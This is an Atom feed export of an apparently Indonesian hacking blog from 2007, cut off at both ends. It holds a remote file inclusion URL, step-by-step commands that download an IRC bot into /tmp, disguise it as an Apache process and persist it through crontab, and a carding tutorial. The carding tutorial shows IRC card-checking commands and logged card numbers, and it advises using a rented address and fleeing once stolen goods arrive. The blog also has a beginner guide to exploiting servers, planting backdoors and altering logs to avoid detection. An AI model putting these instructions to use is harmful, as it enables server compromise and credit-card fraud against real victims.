/&gt;&lt;br /&gt;http://www.timeframeinvestor.com/auth.coo&lt;br /&gt;&lt;br /&gt;kie.inc.php?da_path=http:/geocities.com/banjarworo/pippo.txt?&lt;br /&gt;&lt;br /&gt;dikasih ? inget :&lt;br /&gt;&lt;br /&gt;langsung aja… dech ga bisa basa basi&lt;br /&gt;&lt;br /&gt;1. Kamu cari folder mana yang bisa kamu masuki dengan cara&lt;br /&gt;&lt;br /&gt;find / -type d -perm 777&lt;br /&gt;&lt;br /&gt;Atau kalo nggak mau repot langsung aja kamu&lt;br /&gt;&lt;br /&gt;wget di /var/tmp atau /tmp &lt;&lt;&lt;–diketik di direktori&lt;br /&gt;&lt;br /&gt;1. wget www.freewebs.com/bamby/bamby.tar.gz ato fetch http://geocities.com/banjarworo/pippo.tar.tgz&lt;br /&gt;&lt;br /&gt;2. tar -zxvf bamby.tar.gz ato tar -zxvf pippo.tar.tgz&lt;br /&gt;3. cd .dat&lt;br /&gt;4. ./shanty conf nickbot ident ip-shell channel owner&lt;br /&gt;contoh: ./shanty conf blu3-bot blu3 81.211.12.56 kompeni blu3&lt;br /&gt;&lt;br /&gt;- conf –&gt; config bot&lt;br /&gt;- blu3-bot–&gt; nick bot&lt;br /&gt;- blu3 –&gt; ident&lt;br /&gt;- 81.211.12.56 –&gt; ip shell&lt;br /&gt;- kompeni –&gt; channel (nggak pake #)&lt;br /&gt;- blu3 &lt;– nick owner&lt;br /&gt;&lt;br /&gt;5. ./run conf [fake COMMAND]&lt;br /&gt;contoh: ./run conf “/usr/local/apache/bin/httpd -DSSL”&lt;br /&gt;6. cd scripts&lt;br /&gt;7. ./autobotchk conf -1 -5&lt;br /&gt;autobotchk untuk crontab&lt;br /&gt;8. kalo temen temen pengen nambah tcl di dir /.dat/scripts;wget [tcl]&lt;br /&gt;&lt;br /&gt;contoh : ./scripts; wget http://level9.up.md/seen.tcl&lt;br /&gt;&lt;br /&gt;./scripts; wget http://geocities.com/banjarworo/lelap.txt&lt;br /&gt;9. dir /.dat/; ./tcl -t conf nama.tcl&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-4071237590906555087?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/4071237590906555087'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/4071237590906555087'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/buat-psy.html' title='Buat PsY&amp;eggdroPS'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-2885240959745891101</id><published>2007-09-25T09:31:00.000+07:00</published><updated>2007-09-25T09:43:54.700+07:00</updated><title type='text'>hacking dasar via google</title><content type='html'>dengan menggunakan teknik mesin pencarian kombinasi GOOGLE parameter/operator, seseorang&lt;br /&gt;dapat mengetahui informasi dan mungkin ada celah-celah yg vulnerability dengan mesin&lt;br /&gt;pencari GOOGLE ini.&lt;br /&gt;&lt;br /&gt;1. Mencari Daftar Direktori&lt;br /&gt;dengan mengetik :&lt;br /&gt;&lt;br /&gt;intitle:index.of “parent directory”&lt;br /&gt;intitle:index.of name size&lt;br /&gt;&lt;br /&gt;2. Mendapatkan direktori server deperti :&lt;br /&gt;&lt;br /&gt;intitle:index.of server.at site:aol.com&lt;br /&gt;&lt;br /&gt;3. Pemeriksaan Halaman Web Server APACHE&lt;br /&gt;&lt;br /&gt;Apache 1.3.0–1.3.9&lt;br /&gt;Intitle:Test.Page.for.Apache It.worked! this.web.site!&lt;br /&gt;&lt;br /&gt;Apache 1.3.11–1.3.26&lt;br /&gt;Intitle:Test.Page.for.Apache seeing.this.instead&lt;br /&gt;&lt;br /&gt;Apache 2.0&lt;br /&gt;Intitle:Simple.page.for.Apache Apache.Hook.Functions&lt;br /&gt;&lt;br /&gt;Apache SSL/TLS&lt;br /&gt;Intitle:test.page “Hey, it worked !” “SSL/TLS-aware”&lt;br /&gt;&lt;br /&gt;Many IIS servers&lt;br /&gt;intitle:welcome.to intitle:internet IIS&lt;br /&gt;&lt;br /&gt;Unknown IIS server&lt;br /&gt;intitle:”Under construction” “does not currently have”&lt;br /&gt;&lt;br /&gt;IIS 4.0&lt;br /&gt;intitle:welcome.to.IIS.4.0&lt;br /&gt;&lt;br /&gt;IIS 4.0&lt;br /&gt;allintitle:Welcome to Windows NT 4.0 Option Pack&lt;br /&gt;&lt;br /&gt;IIS 4.0&lt;br /&gt;allintitle:Welcome to Internet Information Server&lt;br /&gt;&lt;br /&gt;IIS 5.0&lt;br /&gt;allintitle:Welcome to Windows 2000 Internet Services&lt;br /&gt;&lt;br /&gt;IIS 6.0&lt;br /&gt;allintitle:Welcome to Windows XP Server Internet Services&lt;br /&gt;&lt;br /&gt;Many Netscape servers&lt;br /&gt;allintitle:Netscape Enterprise Server Home Page&lt;br /&gt;&lt;br /&gt;Unknown Netscape server&lt;br /&gt;allintitle:Netscape FastTrack Server Home Page&lt;br /&gt;&lt;br /&gt;‘n masih banyak lg yg lainnya, tinggal cari aja ok……….&lt;br /&gt;&lt;br /&gt;dari vbbego&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-2885240959745891101?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/2885240959745891101'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/2885240959745891101'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/hacking-dasar-via-google.html' title='hacking dasar via google'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-5628765714024475147</id><published>2007-09-24T21:02:00.000+07:00</published><updated>2007-09-24T21:04:14.786+07:00</updated><title type='text'>List Free Shell</title><content type='html'>Berikut adalah beberapa list gratis dari internet.&lt;br /&gt;&lt;br /&gt;SDF (freeshell.org) - http://sdf.lonestar.org&lt;br /&gt;&lt;br /&gt;GREX (cyberspace.org) - http://www.grex.org&lt;br /&gt;&lt;br /&gt;NYX - http://www.nxy.net&lt;br /&gt;&lt;br /&gt;ShellYeah - http://www.shellyeah.org&lt;br /&gt;&lt;br /&gt;HOBBITON.org - http://www.hobbiton.org&lt;br /&gt;&lt;br /&gt;FreeShells - http://www.freeshells.net&lt;br /&gt;&lt;br /&gt;DucTape - http://www.ductape.net&lt;br /&gt;&lt;br /&gt;Free.Net.Pl (Polish server) - http://www.free.net.pl&lt;br /&gt;&lt;br /&gt;XOX.pl (Polish server) - http://www.xox.pl&lt;br /&gt;&lt;br /&gt;IProtection - http://www.iprotection.com&lt;br /&gt;&lt;br /&gt;CORONUS - http://www.coronus.com&lt;br /&gt;&lt;br /&gt;ODD.org - http://www.odd.org&lt;br /&gt;&lt;br /&gt;MARMOSET - http://www.marmoset.net&lt;br /&gt;&lt;br /&gt;flame.org - http://www.flame.org&lt;br /&gt;&lt;br /&gt;freeshells - http://freeshells.net.pk&lt;br /&gt;&lt;br /&gt;LinuxShell - http://www.linuxshell.org&lt;br /&gt;&lt;br /&gt;takiweb - http://www.takiweb.com&lt;br /&gt;&lt;br /&gt;FreePort - http://freeport.xenos.net&lt;br /&gt;&lt;br /&gt;BSDSHELL - http://free.bsdshell.net&lt;br /&gt;&lt;br /&gt;ROOTshell.be - http://www.rootshell.be&lt;br /&gt;&lt;br /&gt;shellasylum.com - http://www.shellasylum.com&lt;br /&gt;&lt;br /&gt;Daforest - http://www.daforest.org&lt;br /&gt;&lt;br /&gt;FreedomShell.com - http://www.freedomshell.com&lt;br /&gt;&lt;br /&gt;LuxAdmin - http://www.luxadmin.org&lt;br /&gt;&lt;br /&gt;shellweb - http://shellweb.net&lt;br /&gt;&lt;br /&gt;blekko - http://blekko.net&lt;br /&gt;&lt;br /&gt;atau bisa juga cari di www.google.com dengan keyword : Free Shell&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-5628765714024475147?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/5628765714024475147'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/5628765714024475147'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/list-free-shell.html' title='List Free Shell'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-686763126634445637</id><published>2007-09-24T20:53:00.000+07:00</published><updated>2007-09-24T20:56:13.762+07:00</updated><title type='text'>Hacking - Senjata sang carder</title><content type='html'>Tentu kalian udah nggak asing lagi dengan istilah yang satu ini,carder adalah istilah yang diberikan oleh hacker sejati untuk pencuri kartu kredit. Kali ini kita akan bahas soal carder ini.&lt;br /&gt;&lt;br /&gt;Tapi ingat!!! yang aku tulis ini,hanya bersifat ilmu pengetahuan.aku tidak bertanggung jawab jika kalian berurusan dengan pihak kepolisian. Aku sarankan jika kalian mendapat cc jangan beli barang.&lt;br /&gt;&lt;br /&gt;Mari kita mulai......&lt;br /&gt;&lt;br /&gt;1.masuk ke MIRC&lt;br /&gt;dari MIRC kalian join ke channel ini :&lt;br /&gt;&lt;br /&gt;#CCPOSTS&lt;br /&gt;#THACC (Dulu namanya #thecc)&lt;br /&gt;&lt;br /&gt;sebenarnya masih banyak channel yang lainnya tapi aku kasih dua aja yaa!!&lt;br /&gt;&lt;br /&gt;2.setelah join ke #ccpost kamu ketik perintah !commands dan kemudian akan muncul di layar perintah perintah yang bisa kamu gunakan.&lt;br /&gt;&lt;br /&gt;3.!chk cc number valid /!chk 1234567890 1202 untuk mengetahui kartu tsb bisa di gunakan atau tidak.&lt;br /&gt;&lt;br /&gt;4.!cvv2 cc number/ !cvv2 1234567890 untuk mengetahui nomor identitas kartu tsb (card ID)&lt;br /&gt;&lt;br /&gt;5.!proxy&lt;br /&gt;untuk mengetahui nomor proxy dan port yang bisa kamu gunakan untuk mengelabui ISP.&lt;br /&gt;&lt;br /&gt;6.!order.log&lt;br /&gt;untuk mengetahui nama,alamat dan cc number seseorang.&lt;br /&gt;&lt;br /&gt;ini nih cuplikannya :&lt;br /&gt;&lt;br /&gt;#ccposts&lt;br /&gt;&lt;br /&gt;*** Now talking in #ccposts&lt;br /&gt;&lt;br /&gt;*** Topic is '..:: Welcome To #CCPOSTS | !Chk [OFF] !Commands [ON] !Cvv2 [ON] | Also Idle In #Dont.whois.me.bitch and get Aop | +o/+v Verify First| /server xdirc.d2g.com -&gt; Free BNC: /server portatech.net 21500 xdirc'&lt;br /&gt;&lt;br /&gt;*** Set by ^XDIrc^ on Thu May 09 02:04:28&lt;br /&gt;-CCard-Chk-Bot- Tired Of Using Dallnet FFoor Checking CC's ? Try X-Niatites 5.01 -- http://mi5.ausgamers.com/xns501.exe (Win ME untested &amp; 24 Valid CC's Included) !cvv2 5437000105070603 !commands&lt;br /&gt;&lt;br /&gt;*** Quits: MIHUTESCU (~mihut@80.97.26.67) (Client closed connection) Er0sake` , &lt; 5437000105070603 &gt; is Master &gt; cvv2 : -&gt; 074 &lt;-, by : SL[a]TkiS , #DaCc&lt;br /&gt;-listen2rap- SL[a]TkiS's command llist iiss as following: !country Country-Name, !state State-Name, !bank cc-Number, !bnc, !order.log, !cardable, !proxy, !unicode, !cvv2 ccNumber - -=. SL[a]TkiS addon version 4.0, get it at www.sthost4u.net/Programs/slatkis_addon_4.0.zip , #DaCc =- &lt;@^Enhance^&gt; «« Request »» Info«Auth.net Merchant Account - I have Virgins / Cvv2 / eBay Seller Accounts / Proxy / XXX / Cardable Sites / High Limit CCs -- I Ver. First. NewBs &amp; Ripperz Piss Off» « ?×?ü®§î?? »&lt;br /&gt;&lt;br /&gt;*** Joins: ^tyty^ (BaCk0ff@max227.idx.com.au)&lt;br /&gt;&lt;br /&gt;*** Quits: ^tyty^ (BaCk0ff@max227.idx.com.au) (Quit: )&lt;br /&gt;&lt;br /&gt;* DaLinuX i have root i need cc msg me for trade&lt;br /&gt;!chk 373216942923005 0802&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#thacc&lt;br /&gt;*** Now talking in #thacc&lt;br /&gt;*** Topic is 'We are not responsible for any actions that non-op's perform or any actions against DALnet policy that may done at the main chan}}[Type: !commands ] ||GSD's site: www.TheCC.biz || [ Join #CCpower ] [new command by GSD &gt; !phone &lt; only when MR^all' is here] y2y = GSD'&lt;br /&gt;*** Set by GSD on Fri May 03 02:11:11&lt;br /&gt;!proxy&lt;br /&gt;*** Parts: fc4 (~umik_o@203.147.50.12)&lt;br /&gt;*** Joins: fc4 (~umik_o@203.147.50.12)&lt;br /&gt;&lt;^Enhance^&gt; «« Request »» Info«Auth.net Merchant Account - I have Virgins / Cvv2 / eBay Seller Accounts / Proxy / XXX / Cardable Sites / High Limit CCs -- I Ver. First. NewBs &amp; Ripperz Piss Off» « ?×?ü®§î?? »&lt;br /&gt;*** Quits: ALICE22 (kozxgy@189.Red-80-34-233.pooles.rima-tde.net) (Quit: IRcap 7.1 http://www.ircap.net !)&lt;br /&gt;*** Quits: ^tyty^ (BaCk0ff@max227.idx.com.au) (Quit: ) !xlogin 373216942923005 0802&lt;br /&gt;*** e_KiNGHT-[Away] is now known as Guest53360&lt;br /&gt;How I can see my card is valid&lt;br /&gt;* DaLinuX i have root i need cc msg me for trade&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Jelas ??!&lt;br /&gt;Sekedar saran aja, pakai alamat rumah kontrakan/kost, jadi setelah barang yang didapat sampai, segera kabur dari rumah tersebut, hheeeehe, biar gak dilacak.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;from www.sectors.vze.com&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-686763126634445637?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/686763126634445637'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/686763126634445637'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/hacking-senjata-sang-carder.html' title='Hacking - Senjata sang carder'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-1509560661531509329</id><published>2007-09-24T20:38:00.000+07:00</published><updated>2007-09-24T20:48:16.578+07:00</updated><title type='text'>Belajar Hack</title><content type='html'>Belajar Hack (1) - Konsep Dasar Hacking&lt;br /&gt;8 11 2006&lt;br /&gt;&lt;br /&gt;Intro&lt;br /&gt;&lt;br /&gt;Dalam suatu kesempatan, saya pernah melihat seorang auditor keamanan jaringan melalukan penetration test (pen-test) terhadap suatu sistem IT. Karena penasaran saya melihat sedikit2 cara penetration test yang dilakukan. Waktu itu saya belum banyak tahu tools apa aja yang digunakan, yang saya tau dia menggunakan tcpdump untuk menganalisis paket apa aja yang lewat, trus untuk men-scan beberapa host menggunakan Nessus. Ada salah satu aplikasi yang digunakan berbasis web yang terdapat kumpulan beberapa exploit. Waktu itu saya belum tahu aplikasi apa itu, yang saya ingat aplikasi itu menggunakan alamat http://127.0.0.1:55555, nah berbekal port 55555 saya mencari di google, dan ternyata itu adalah Metasploit Framework!.&lt;br /&gt;&lt;br /&gt;Peristiwa itu menginspirasikan saya untuk mengenang masa-masa lalu ketika masih seneng2nya ngoprek dan belum ‘tercemar’ oleh DotA. Akhirnya sekarang saya ingin belajar ngoprek lagi, tp lebih fokus ke exploitnya saja. Tulisannya ini akan saya buat menjadi tiga bagian. Bagian pertama mengenai bagaimana salah satu cara umum yang dilakukan untuk menge-hack suatu system. Disini saya lebih menitikberatkan untuk hacking OS Windows XP, karena OS ini paling banyak dipakai orang. Bagian kedua lebih banyak ke teori mengenai exploit. Tapi karena mungkin akan sangat sulit dipahami (saya sendiri msh blm bisa membuat exploit sendiri), saya hanya menuliskan hasil terjemahan yang membahas apa itu dan cara kerja exploit. Sedangkan bagian terakhir merupakan praktek bagaimana mengelakukan penetration test menggunakan metasploit di Windows XP.&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Bagian 1&lt;br /&gt;&lt;br /&gt;*ini merupakan artikel lama mengenai salah satu cara umum yang dilakukan untuk hacking. (artikel ini jg di mirror oleh Negative a.k.a Jim Geovedi di sini). Langkah dibawah ini merupakan cara ’standar’, hacking sebenarnya tidak harus selalu sesuai dengan ’standar’ ini.&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Hacking buat pemula&lt;br /&gt;&lt;br /&gt;- by aCh&lt;br /&gt;&lt;br /&gt;Artikel ini ditujukan bagi pemula, dan disusun oleh pemula. Ditulis untuk pengetahuan semata. Untuk temen2 yg udah ahli, sok aja dilewat, tapi dibaca juga gpp….&lt;br /&gt;&lt;br /&gt;Apa sebenarnya hacking itu? klo menurut pengertian gue, hacking adalah ngoprek. Yup, hacking adalah ngoprek, mempelajari sesuatu dengan keingintahuan (curiosity) yg tinggi, ngutak atik sesuatu, ‘ngudek-ngudek’ sampai ke ‘jeroannya’. Sesuatunya apa dong? ya terserah… bisa komputer, mobil, motor, mesin. Tapi masalahnya ada ngga ya hacker mobil, hacker motor, atau hacker pesawat terbang?? hehe… Walaupun saat ini hacking identik dengan ‘bobol-membobol’, tapi gue kurang setuju klo cuman bobol server orang doang!. Ada yang bilang ‘Hacking is Art’, trus dimana letak seninya dong? Mau tau pengertian hacking sebenarnya, coba baca artikel sebelumnya (How to Become A Hacker). Di situ dijelasin bahwa hacker berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Contoh hacker pada saat ini yang sering-sering disebut adalah Linus Torvald (tau ngga? itu lho yang menciptakan Linux). Apa dia tukang bobol? belum tentu kan….&lt;br /&gt;&lt;br /&gt;Pada artikel ini, gue pengen membagi pengalaman mengenai Hacking, walaupun sampai saat ini gue belum pernah nge-Hack ke server orang. Salah satu cara untuk mencoba simulasi Hack yaitu H3cky0uRs3lf! Buat komputer kita sebagai server (sekaligus belajar konfigurasi server) trus install program yg dibutuhkan. Misalnya klo mo Web Hacking, coba install Apache atau IIS. Atau kita sesuaikan dengan exploit yang udah kita dapet. Tapi lebih baik install Linux atau FreeBSD dulu di komputer pribadi, trus konfigurasi sebagai server, lalu simulasi Hack, setelah itu baru Hack Betulan… Apalagi klo di kost ada jaringan.&lt;br /&gt;&lt;br /&gt;Pro dan Kontra Hacking&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Pro&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Kontra&lt;br /&gt;&lt;br /&gt;Etika Hacking&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Semua informasi adalah free&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Jika semua informasi adalah free, maka tidak ada ladi privacy&lt;br /&gt;&lt;br /&gt;Aspek Security&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Intrusion adalah ilustrasi kelemahan sistem&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Tidak perlu menjadi pencuri untuk menunjukkan pintu yang tidak terkunci&lt;br /&gt;&lt;br /&gt;Idle Machines&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Hacking hanya pada idle machines&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;idle machines milik siapa ?&lt;br /&gt;&lt;br /&gt;science education&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;hanya membobol tapi tidak merusak&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;“hacker wannabe” berpotensi sangat besar untuk merusak&lt;br /&gt;&lt;br /&gt;Okeh, sekarang waktunya melakukan aksi…&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;1. Fase Persiapan&lt;br /&gt;&lt;br /&gt;~ Mengumpulkan informasi sebanyak-banyaknya&lt;br /&gt;&lt;br /&gt;- Secara Aktif : - portscanning&lt;br /&gt;&lt;br /&gt;- network mapping&lt;br /&gt;&lt;br /&gt;- OS Detection&lt;br /&gt;&lt;br /&gt;- application fingerprinting&lt;br /&gt;&lt;br /&gt;Semua itu bisa dilakukan menggunakan toolz tambahan seperti nmap atau netcat&lt;br /&gt;&lt;br /&gt;- Secara Pasif : - mailing-list (jasakom, newbie_hacker, hackelink, dsb)&lt;br /&gt;&lt;br /&gt;- via internet registries (informasi domain, IP Addres)&lt;br /&gt;&lt;br /&gt;- Website yang menjadi terget&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;2. Fase Eksekusi&lt;br /&gt;~ Setelah mendapatkan informasi, biasanya akan didapatkan informasi mengenai OS yg digunakan, serta port yang terbuka dengan daemon yg sedang berjalan. Selanjutnya mencari informasi mengenai vulnerability holes (celah kelemahan suatu program) dan dimanfaatkan menggunakan exploit (packetstromsecurity.org, milw0rm, milis bugtraq, atau mencari lewat #IRC).&lt;br /&gt;~ Mengekspolitasi Vulnerability Holes&lt;br /&gt;- compile eksploit -&gt; local host -&gt;&lt;br /&gt;&lt;br /&gt;    $gcc -o exploit exploit.c&lt;br /&gt;&lt;br /&gt;    $./exploit&lt;br /&gt;&lt;br /&gt;# hostname (# tanda mendapatkan akses root)&lt;br /&gt;&lt;br /&gt;    remote host -&gt; $gcc -o exploit exploit.c&lt;br /&gt;&lt;br /&gt;    $./exploit -t www.target.com&lt;br /&gt;&lt;br /&gt;# (klo beruntung mendapatkan akes root)&lt;br /&gt;&lt;br /&gt;~ Brute Force&lt;br /&gt;&lt;br /&gt;- Secara berulang melakukan percobaan otentifikasi.&lt;br /&gt;&lt;br /&gt;- Menebak username dan password.&lt;br /&gt;&lt;br /&gt;- Cracking password file&lt;br /&gt;&lt;br /&gt;~ Social Engineering&lt;br /&gt;&lt;br /&gt;- Memperdayai user untuk memeberi tahu Username dan password&lt;br /&gt;&lt;br /&gt;- Intinya ngibulin user….&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;3. Fase Setelah Eksekusi&lt;br /&gt;&lt;br /&gt;~ Menginstall backdoor, trojans, dan rootkit&lt;br /&gt;&lt;br /&gt;~ Menghapus jejak dengan memodifikasi file log agar tidak dicurigai admin&lt;br /&gt;&lt;br /&gt;~ Menyalin /etc/passwd atau /etc/shadow/passwd&lt;br /&gt;&lt;br /&gt;Nah, intinya seh cara masuk ke server seseorang seperti fase diatas. Mencari informasi, temukan exploit, dan tinggalkan backdoor. Cuma masalahnya hacking bukanlah segampang cara-cara diatas. Itu hanyalah teori, banyak hal yang harus diperhatikan jika ingin mempraketekkan hacking ke server seseorang. Jangan sekali-kali mencoba2 hacking ke server orang tanpa memperhatikan anonimitas (apalagi klo connectnya lewat komputer pribadi tanpa menggunakan proxy). Ntar klo ketahuan bisa repot. Saran gue, cobalah pada mesin localhost dulu (komuter pribadi), klo terhubung ke LAN lebih bagus. Sediakan server yang khusus buat dioprek. Kalaupun pun ga terhubung ke jaringan, kita masih bisa menggunakan Virtual Machine menggunakan VMWare seperti yang nanti akan dibahas pada bagian 3!&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Referensi :&lt;br /&gt;&lt;br /&gt;-Hacking and Defense, Jim Geovedi, negative@magnesium.net&lt;br /&gt;&lt;br /&gt;-Network Defense, Jim Geovedi, negative@magnesium.net&lt;br /&gt;&lt;br /&gt;Belajar Hack (2) - What is an Exploit?&lt;br /&gt;8 11 2006&lt;br /&gt;&lt;br /&gt;*This article originally was written by Pukhraj Singh, K.K. Mookhey, you can get it from here. I am just repost and summarize it so you can understand what is an exploit. I’m sorry not to translate this article into Bahasa Indonesia coz I’m too lazy. Maybe you want to help us to translate it? :-)&lt;br /&gt;&lt;br /&gt;Exploit&lt;br /&gt;&lt;br /&gt;sploit&lt;br /&gt;(n.) Exploit. A defect in the game code (see bug) or design that can be used to gain unfair advantages. (Source: Dictionary of MMORPG Terms)&lt;br /&gt;&lt;br /&gt;At present the exploit development community (hackers and security professionals alike) is more sentient than ever before. The timeline between the release of an advisory and the development of an exploit has shrunk to a great extent. Exploit development, which was considered more of Wiccan art, has reached large masses. The network security administrator needs to be more vigilant then ever before as the enemy is always one step ahead with the latest exploit in his hand.&lt;br /&gt;Memory organization&lt;br /&gt;&lt;br /&gt;The basic exploitation techniques can be methodically categorized, like any other technical issue. Before going further, however, the reader must be aware of the basic process of memory organization. A process running in memory has the following sub-structures:&lt;br /&gt;&lt;br /&gt;Code is the read-only segment that contains the compiled executable code of the program.&lt;br /&gt;&lt;br /&gt;Data and BSS are writable segments containing the static, global, initialized and un-initialized data segments and variables.&lt;br /&gt;&lt;br /&gt;Stack is a data structure based on Last-In-First-Out ordering. Items are pushed and popped from the top of the stack. A Stack Pointer (SP) is a register which points to the top of the stack (in most cases). When data is pushed on the stack, SP points to (the top of the stack). Stack grows towards negative memory addresses. It is used for storing the context of a process. A process pushes all its local and dynamic data on to the stack. Instruction Pointer (IP) is a register used to point to the address of the next instruction to be executed. The processor looks at IP each time to find the next instruction to be executed. When an abrupt program redirection takes place (generally due to jmp or call) the address of the next instruction, after returning back from redirection, can be lost. In order to overcome this problem the program stores the address of the next instruction to be executed (after returning from jmp or call) on the stack, and it is called the return address (implemented through assembly instruction RET). This is how a normal program containing many function calls and goto instructions keeps track of right path of execution.&lt;br /&gt;&lt;br /&gt;Heap is basically the rest of the memory space assigned to the process. It stores data which have a lifetime in between the global variables and local variables. The allocator and deallocator work to assign space to dynamic data and free heap memory respectively.&lt;br /&gt;&lt;br /&gt;This was a brief fly-over on the basics of process organization. Now I describe some techniques recurrently used to abuse the harmony of process organization.&lt;br /&gt;Buffer overflows&lt;br /&gt;&lt;br /&gt;The word gives goose bumps to any person who has dealt with them, be it a coder, an application tester or the security administrator. Some say it’s the biggest security risk of the decade. The technique of exploitation is straightforward and lethal. The stack of the program stores the data in order whereby the parameters passed to the function are stored first, then the return address, then the previous stack pointer and subsequently the local variables. If variables (like arrays) are passed without boundary checks, they can be overflowed by shoving in large amounts of data, which corrupts the stack, leading to the overwrite of the return address and consequently a segmentation fault. If the trick is craftily done we can modify the buffers to point to any location, leading to capricious code execution.&lt;br /&gt;Heap overflows&lt;br /&gt;&lt;br /&gt;The allocated memory in a heap is organized as a doubly linked list. By performing an overflow we can modify the pointers of the linked list to point into memory. Heap overflows are hard to exploit and are more common in Windows as they contain more prominent data which can be exploited. In the case of a malloc memory allocation system, the information regarding the free and allocated memory is stored within the heap. An overflow can be triggered by exploiting this management information such that we can write to random memory areas afterwards, which can lead to code execution.&lt;br /&gt;&lt;br /&gt;So how is the overflow triggered? There are many weapons in the stockpile like strings and string functions, format strings, null pointers, integer overflows, signed issues and race conditions which can be a help to generate exceptional conditions in a process.&lt;br /&gt;&lt;br /&gt;I stress the fact that this article was not meant to be a definitive guide to various exploitation techniques. We only provide a quick overview of what is important, in order to get a solid understanding of the things to come in subsequent parts of this article. They just act as pointers for further reference&lt;br /&gt;&lt;br /&gt;The Birth of an Exploit&lt;br /&gt;&lt;br /&gt;Exploit development tools and automated frameworks for exploit testing and simulation is the need of the hour. Metasploit Framework (MSF) is something which fits the bill. Its latest release has the agility and muscle quite comparable to its high priced commercial counterparts and the lethality to code an exploit in the shortest possible timeframe, due to a very well defined interface for development. With a complete exploit environment, working exploits, effectual payloads and added handlers, this is one tool which the penetration testers must utilize.&lt;br /&gt;&lt;br /&gt;The body or structure of an exploit can be divided into various components, as described in Figure 1. We describe some exploit miscellany which will help us to analyze the figure as shown.&lt;br /&gt;&lt;br /&gt;exploit.JPGFigure 1&lt;br /&gt;Shellcode&lt;br /&gt;&lt;br /&gt;This is the payload which is to be executed after exploitation. In most cases we redirect the path of execution so that the injected payload is executed. Hence the return address is made to point to this shellcode. It comprises of assembly instructions encoded as a binary string which perform operations like spawning a shell. A good piece of shellcode must be a trade-off between and size and complexity. There are a lot of verifications to be made during payload encoding like keeping a check on restricted characters. Nowadays, payloads have been customized to be very short and require less space. They can execute many complex operations from opening a listening socket to even loading a compiler on the remote computer.&lt;br /&gt;Injection vector&lt;br /&gt;&lt;br /&gt;The pointer or offset where the shellcode is placed in a process and the return address is modified to point to.&lt;br /&gt;&lt;br /&gt;Request builder&lt;br /&gt;&lt;br /&gt;This is the code which triggers the exploit. If it’s related to string functions, then scripting languages are generally preferred.&lt;br /&gt;&lt;br /&gt;Handler Routine&lt;br /&gt;&lt;br /&gt;This part generally consumes the majority of the code. This is a handler for the shellcode doing operations like linking to a bindshell, or connecting console to a socket.&lt;br /&gt;&lt;br /&gt;User options handler&lt;br 